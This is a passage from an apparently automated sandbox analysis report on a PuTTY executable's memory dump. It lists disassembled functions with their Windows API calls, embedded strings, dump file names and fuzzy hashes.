Instruction Fuzzy Hash: 8C11E7E9D0438067DA112A307C93F9B32D45B61708F080079FC8695253FAB1D9149263

Function 00BCCCC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32(?), ref: 00BCCD43
CloseHandle.KERNEL32(?), ref: 00BCCD4C

Strings

End of file reading from serial device, xrefs: 00BCCCFF, 00BCCD64, 00BCCD70
Error reading from serial device, xrefs: 00BCCCFA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: End of file reading from serial device$Error reading from serial device
API String ID: 2685284230-2629609604
Opcode ID: 169b9875e0bd43fd613c8f2eacd43549448f2f2cbb26f966ffde93d54a5f8671
Instruction ID: 03553dda27700495bc3881dd6ce50588ed4666abaa7ca159b7a8eb37bc63998d
Opcode Fuzzy Hash: 169b9875e0bd43fd613c8f2eacd43549448f2f2cbb26f966ffde93d54a5f8671
Instruction Fuzzy Hash: BB2168B1A007419BDB20AF68D888F077BE8EFA4314F14497DF86A83291E631E814CB51

Function 00BDC340 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BD4BC3,00000000,RandSeedFile), ref: 00BDC367
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BDC39F

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/utils/registry.c, xrefs: 00BDC3B9
size < allocsize, xrefs: 00BDC3BE

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: QueryValue
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/utils/registry.c$size < allocsize
API String ID: 3660427363-1544670526
Opcode ID: bb4b0cc85fc63bf2f91ddff82521f09743cde03c95078dcc314f0c7125f7d3d0
Instruction ID: 85c1cb6af606551c513e0453ee253c571d7bd32b64da7d81fd1f57fcf88799ef
Opcode Fuzzy Hash: bb4b0cc85fc63bf2f91ddff82521f09743cde03c95078dcc314f0c7125f7d3d0
Instruction Fuzzy Hash: D811C172644304BFD610AB54AD86F2FBBEDEF95B58F00442AF9899A240F2B19C11C796

Function 00BC3D50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00BC3DF9

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3D95, 00BC3DB9, 00BC3DDC
!c->ctrl->fileselect.just_button, xrefs: 00BC3DE1
c->ctrl->type == CTRL_FILESELECT, xrefs: 00BC3DBE

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText
String ID: !c->ctrl->fileselect.just_button$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c->ctrl->type == CTRL_FILESELECT
API String ID: 3367045223-3069912705
Opcode ID: 26b4afdc60aaea6c72b07541facd85fdbc44ce151a4ce4e957c2a58a7d835f31
Instruction ID: 449ce1d03f59064458641148f8157db3308aae9b5e64ecd00200048bae8e380e
Opcode Fuzzy Hash: 26b4afdc60aaea6c72b07541facd85fdbc44ce151a4ce4e957c2a58a7d835f31
Instruction Fuzzy Hash: 3C116271640304BFEB109E54DC8AF3677E4FB45B14F0500B8F044A7191E762AD29C791

Function 00BD7F30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

_wctomb_s.LIBCMT ref: 00BD7FB5

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/conf.c, xrefs: 00BD7F53, 00BD7F78
valuetypes[primary] == TYPE_STR, xrefs: 00BD7F7D
subkeytypes[primary] == TYPE_STR, xrefs: 00BD7F58

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _wctomb_s
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/utils/conf.c$subkeytypes[primary] == TYPE_STR$valuetypes[primary] == TYPE_STR
API String ID: 2865277502-4017404354
Opcode ID: 539cc642fc66d787b07d58c40f893ce54f8b5f29e00ad203464fe56d4b483924
Instruction ID: 49248fb596220e4d83650641ac9c529d00c0c40ca164babdcd211c6a15b15172
Opcode Fuzzy Hash: 539cc642fc66d787b07d58c40f893ce54f8b5f29e00ad203464fe56d4b483924
Instruction Fuzzy Hash: D911A771688351EFC7109B14DC06E5ABBE1EBC5B14F0544A9F9842B3A0FA719C45CAD2

Function 00BA1060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49registrywindowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(MZx,000000C8), ref: 00BA10E4
LoadCursorA.USER32(00000000,00007F01), ref: 00BA10F5
RegisterClassW.USER32 ref: 00BA111B

Strings

MZx, xrefs: 00BA10E3

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Load$ClassCursorIconRegister
String ID: MZx
API String ID: 738324305-2575928145
Opcode ID: 3dcbc1e330538d8f949e04f2aa86e25286af63b010208bcdb052e3604da0f6db
Instruction ID: 678cc666d720a927fd25a59ac2b55add5ca98c9548e66854d99510db91c45972
Opcode Fuzzy Hash: 3dcbc1e330538d8f949e04f2aa86e25286af63b010208bcdb052e3604da0f6db
Instruction Fuzzy Hash: DE1113709083109FE750DF28EC5971E7BF0EB49758F00491AE889AB2A0D3B58984CB92

Function 00BA67B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 00BA67F9
ShowCursor.USER32(00000001), ref: 00BA683D
MessageBoxA.USER32(Connection closed by remote host,00000040), ref: 00BA685D

Strings

Connection closed by remote host, xrefs: 00BA6852

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message$CursorPostQuitShow
String ID: Connection closed by remote host
API String ID: 3394085358-3682140707
Opcode ID: e371d143e1aed7b39483f9bcbd44a9a2ac69f61ff164d7fdfc37588e9ff0800f
Instruction ID: 680051e877aea2cc31e6a3d345f7a05dc9b78869c354c76da4d6bb23f7fd83d9
Opcode Fuzzy Hash: e371d143e1aed7b39483f9bcbd44a9a2ac69f61ff164d7fdfc37588e9ff0800f
Instruction Fuzzy Hash: 250145F0948240ABEB302724FC0EB4C3BC5E70331EF1C01A6F941921F1EAB68992C7A1

Function 00BA63F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA6429
MessageBoxA.USER32(?,00000000,00000010), ref: 00BA6440
PostQuitMessage.USER32(00000001), ref: 00BA6476

Strings

%s Fatal Error, xrefs: 00BA63FC

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message$CursorPostQuitShow
String ID: %s Fatal Error
API String ID: 3394085358-656502033
Opcode ID: 2fe8fa3ee6081f614c30d28bf13dd4c30eeb47118f489d519f6d67560ba8620b
Instruction ID: 9db67c012c1924e70e7c1617f99bbc5fca0a33fcb3cba8eabbe4ff154f1630c4
Opcode Fuzzy Hash: 2fe8fa3ee6081f614c30d28bf13dd4c30eeb47118f489d519f6d67560ba8620b
Instruction Fuzzy Hash: 85F0F975584210ABD6303724BC0AF4D3B94A707749F084066F681552F2EEA24551DBF2

Function 00BA6A00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4FB31: IsProcessorFeaturePresent.KERNEL32(00000017,00C4348B,?,?,?,?,00000000), ref: 00C4FB4D

GetDC.USER32(00000000), ref: 00BA6A3E
SelectPalette.GDI32(00000000,00000000), ref: 00BA6A53

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA6A20
!wintw_hdc, xrefs: 00BA6A25

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: FeaturePalettePresentProcessorSelect
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
API String ID: 1536087120-2668247132
Opcode ID: 3b1890073f02f8ce39b6e6661a78f5e94c21a41dc923bba93e08f26905bc1083
Instruction ID: d54196472228f17ab370ab275410c66d9cd3ff571b6ec95030947d2b6b735fa2
Opcode Fuzzy Hash: 3b1890073f02f8ce39b6e6661a78f5e94c21a41dc923bba93e08f26905bc1083
Instruction Fuzzy Hash: D0F0E5F2A40210ABE6104B28ED2FF5E33D9EB8AB45F098039B910DB694DA7189038710

Function 00BC5D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36networkCOMMON

Download Yara Rule

APIs

WSAAsyncSelect.WS2_32(?,00000000,00008005,0000003F), ref: 00BC5D44
WSAGetLastError.WS2_32 ref: 00BC5D53

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/select-gui.c, xrefs: 00BC5D29
winsel_hwnd, xrefs: 00BC5D2E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AsyncErrorLastSelect
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/select-gui.c$winsel_hwnd
API String ID: 1263927367-1065112538
Opcode ID: 2b205075d333218d5aa5d7db93f3d723e884968ba23a576d71e50f3efe2464db
Instruction ID: fdf7d3ef3a51def56715580168cf10e4c183d84b5a4d1ca23d489626787f2eb6
Opcode Fuzzy Hash: 2b205075d333218d5aa5d7db93f3d723e884968ba23a576d71e50f3efe2464db
Instruction Fuzzy Hash: 20F0E2B1A007002FDB205A74AC8EF5B26DCDBCA7A9F460878F416D7181EA60EC454771

Function 00BA7FF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00BA9D30,00000000), ref: 00BA8033
CloseHandle.KERNEL32(00000000), ref: 00BA803E

Strings

clipboard == CLIP_SYSTEM, xrefs: 00BA8012
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA800D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$clipboard == CLIP_SYSTEM
API String ID: 3032276028-2875968380
Opcode ID: 6d90007a31322374524250917ab12e5441abc350f6232a0a4c4bf91c00866cd3
Instruction ID: feb054f39a782853c63f4473af26f1f27c7f8e010d6697f42b74c6853585d7ed
Opcode Fuzzy Hash: 6d90007a31322374524250917ab12e5441abc350f6232a0a4c4bf91c00866cd3
Instruction Fuzzy Hash: 66F065747843007BDA286B28AD0BB2E36A4EB8AF05F40042DFD46AA2D1DE609414D656

Function 00BBF490 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00BBF4BE

Strings

You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00BBF499
PuTTY, xrefs: 00BBF498, 00BBF4A8
%s Key File Warning, xrefs: 00BBF4A9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message
String ID: %s Key File Warning$PuTTY$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
API String ID: 2030045667-626526669
Opcode ID: e897ee096428733abfec954ae57a2866277acd3a6f49d397b51dabf565e1d883
Instruction ID: ff64969de2eec48611c020474a9f7554256bb239aff92e1231ff9d0996b36654
Opcode Fuzzy Hash: e897ee096428733abfec954ae57a2866277acd3a6f49d397b51dabf565e1d883
Instruction Fuzzy Hash: 1AE0267694010076E02036223C0BF6F69ACCBD3B67F18407AFA0999382FC61180183F3

Function 00C5D5CC Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(A5F18998,00000000,00000000,00000000), ref: 00C5D62F

Part of subcall function 00C5BA6A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C60F69,?,00000000,-00000008), ref: 00C5BB16

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C5D88A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C5D8D2
GetLastError.KERNEL32 ref: 00C5D975

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 19a338ccb77c9056c54fea4303a6b8806ebe15a1fde6f71b7a3f16e63b46dbd4
Instruction ID: 539d6065a4b9fdb4b47ddc8e9bd427612bbd8e380ed71a516a6b0f0a102b61af
Opcode Fuzzy Hash: 19a338ccb77c9056c54fea4303a6b8806ebe15a1fde6f71b7a3f16e63b46dbd4
Instruction Fuzzy Hash: 50D18EB9D00248DFCF15CFA8D880AADBBB5FF49305F14412AE866EB351D730A986CB54

Function 00BF13E0 Relevance: 6.2, APIs: 4, Instructions: 168timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00BF14BF
__aulldiv.LIBCMT ref: 00BF14E3
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BF153E
__aulldiv.LIBCMT ref: 00BF1561

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Time$File$__aulldiv$LocalSystem
String ID:
API String ID: 1236384784-0
Opcode ID: 12039b3a895ebb9155544b41b7b0a626a4e2ed2db2289a0fb3f14b60f084184c
Instruction ID: cc6ace5f4376c758f399d5798a3df2b8e7fd56c03c9a57f17e36328af3a94406
Opcode Fuzzy Hash: 12039b3a895ebb9155544b41b7b0a626a4e2ed2db2289a0fb3f14b60f084184c
Instruction Fuzzy Hash: E06136716043099FCB14CF28C844BAAB7E5EFC8718F118A6DF99997390D771E805CB92

Function 00C638B2 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C63979
___AdjustPointer.LIBCMT ref: 00C6399C
___AdjustPointer.LIBCMT ref: 00C63A38

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: de20fede7dae8a4aaf4d1002212f23d0b18f3e323b74a1920b444a9f2615aba3
Instruction ID: 4a4911c4c51d6e2960d6b0d30de6be7d60d1aa7f9c8575c337088dee719ba421
Opcode Fuzzy Hash: de20fede7dae8a4aaf4d1002212f23d0b18f3e323b74a1920b444a9f2615aba3
Instruction Fuzzy Hash: 3B510172600286AFDB398F55C882BBAB7B4FF54310F24402DE956472A1D771EF81EB50

Function 00C4E778 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f2084077d556c4017eee796510d7b548fc58f04bea8d3d979a9bf89a54bf4b
Instruction ID: 02cea51e70d65a8e957edde64b57b4b25970f2eef3cdbc58db6eecb030a05c55
Opcode Fuzzy Hash: a5f2084077d556c4017eee796510d7b548fc58f04bea8d3d979a9bf89a54bf4b
Instruction Fuzzy Hash: E041D772A00708AFDB249F7CCC41B5ABBB9FF84720F11852AF551DB2C1D771A9409780

Function 00BA8750 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00BA878E
GetSysColor.USER32 ref: 00BA87ED
GetSysColor.USER32 ref: 00BA884C
GetSysColor.USER32 ref: 00BA8889

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: 53ebf46de078bed9ff2980f84214174fa43bf1379b8e04b312c0c5d59702e9a1
Instruction ID: 6cbf9076f101675212c2ef00149d8837a65d8dc49ac03e50e0759cc261782e0b
Opcode Fuzzy Hash: 53ebf46de078bed9ff2980f84214174fa43bf1379b8e04b312c0c5d59702e9a1
Instruction Fuzzy Hash: 2741A36501D3D1AED301AFA8801426FBFE4AFAA604F45CD8EF8D887352D674C585DB63

Function 00BA1EED Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00BC5010: DestroyWindow.USER32(00000000,?,00BA1E3E,00000001), ref: 00BC5023

InvalidateRect.USER32(?,00000000,00000001), ref: 00BA1F5C
GetClientRect.USER32(?), ref: 00BA1F70
InvalidateRect.USER32(00000000,00000001), ref: 00BA1FEC
DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Rect$InvalidateWindow$ClientDestroyProc
String ID:
API String ID: 3789280143-0
Opcode ID: 3169a7ef49437f826397e3f86dd252a74493c06a033338df4702475b6d4f1ffe
Instruction ID: 9258b70a86f51b238e510e23b2c78fa97101a16910f3757f4dae8665536b0c20
Opcode Fuzzy Hash: 3169a7ef49437f826397e3f86dd252a74493c06a033338df4702475b6d4f1ffe
Instruction Fuzzy Hash: 8E3127B16042809FD7309B18EC62F6DB7E5F786709F048039F989C72B1EB3269149B91

Function 00C5ADDC Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00C5BA6A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C60F69,?,00000000,-00000008), ref: 00C5BB16

GetLastError.KERNEL32 ref: 00C5AE40
__dosmaperr.LIBCMT ref: 00C5AE47
